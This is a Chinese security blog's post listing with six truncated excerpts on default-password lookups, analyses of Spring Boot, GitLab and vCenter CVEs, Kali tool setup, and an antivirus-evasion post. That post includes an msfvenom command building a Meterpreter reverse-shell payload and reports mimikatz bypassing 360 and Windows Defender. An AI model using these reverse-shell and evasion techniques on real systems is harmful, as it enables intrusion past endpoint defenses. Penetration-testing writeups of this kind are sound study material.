- 博客(6)
- 收藏
- 关注
RSS订阅原创 渗透测试:常见产品弱口令速查
大企业规模下的资产系统弱口令可谓是遍地都是,这是大企业的通病,也是很难管理的一点。最常见的攻击手法就是利用系统的弱口令登录到后台管理系统,然后从后台突破到服务器,接着拿下服务器的控制权限。下面是常见产品的弱口令速查表回复弱口令获取速查表默认密码在线查询站点## CIRT.nethttps://cirt.net/passwordshttps://cirt.net/passwords## 默认密码列表https://datarecovery.com/rd/def...
2021-11-01 15:22:54
478
原创 Spring-Boot Actuator-logview 文件包含漏洞(CVE-2021-21234)分析
0x01 前言首先声明一下CVE-2021-21234是属于文件包含漏洞,却被很多人起标题写成文件上传、文件、任意文件上传等等。起初看到这些标题的时候都给我整的一愣一愣的,到底是文件包含还是任意文件下载,还是文件上传。很凑巧,近期有Spring-Boot目标需要进行测试,因此做好记录。0x02 漏洞分析Actuator-logview是Spring Boot中的类似插件的库,此库的维护已经没有很久没有更新,而Actuator-logview中存在一个简单的日志文件查看器的功能,其端点路径为/
2021-10-29 12:11:28
7432
原创 Gitlab 远程命令执行漏洞(CVE-2021-22205)分析
0x01 前言GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用。0x02 漏洞分析未授权的端口在于用户注册:https://xx.xx.xx.xx/users/sign_up还可以滥用Gitlab API接口列出所有项目(包括私有项目)https://xx.xx.xx.xx/api/v4/projec.
2021-10-29 11:32:37
3572
原创 Kali-现代化工具基础建设
鉴于 Kali 里面的很多工具集都是偏海外以及是英文版的原因,导致其中有很多工具集我们是很少用的,用的最多的无异于MSF、sqlmap、nmap这些耳熟能详的工具了。本文安装配置主要摘自 @ffffffff0x 团队分享的 “Kali系统基础设施配置” 软文 ->传送门为了将现代的多款主流、常用的工具集整合进来,我们需要安装好依赖、环境以及配置好源。需要整合进去的工具如下:Volatility distorm RustScan hashcat、7z2hashcat unyaf...
2021-10-18 10:21:01
338
原创 VMware vCenter Server 任意文件上传漏洞(CVE-2021-22005)检测
0x01 前言很凑巧,今天刚出的VMware vCenter Server 任意文件上传漏洞通告,立马就在工作中用上了。正在内网渗透测试的我,刚发现一目标存在VMware vCenter任意文件读取漏洞,就看到阿里云应急响应中心发出的通告,随后立马去找到POC去检测,借此记录一下。0x02 漏洞描述VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。2021年9月22日,VMware 官方发布安全公告,披露了包括 CVE-2021-22005 VMwar
2021-09-26 10:30:51
4030
原创 我的免杀之路:利用darkarmour实现mimikatz和MSF的免杀
0x1 mimikatz免杀这里加密字节的过程比较久,尝试运行bypass_mimikatz.exe运行成功,看看免杀效果如何Bypass 360 success!Bypass Windows Defender success!V站评分10/660x2 MSF免杀先生成可执行文件msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.160.128 LPORT=4488 ..
2021-09-24 11:10:49
1362
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人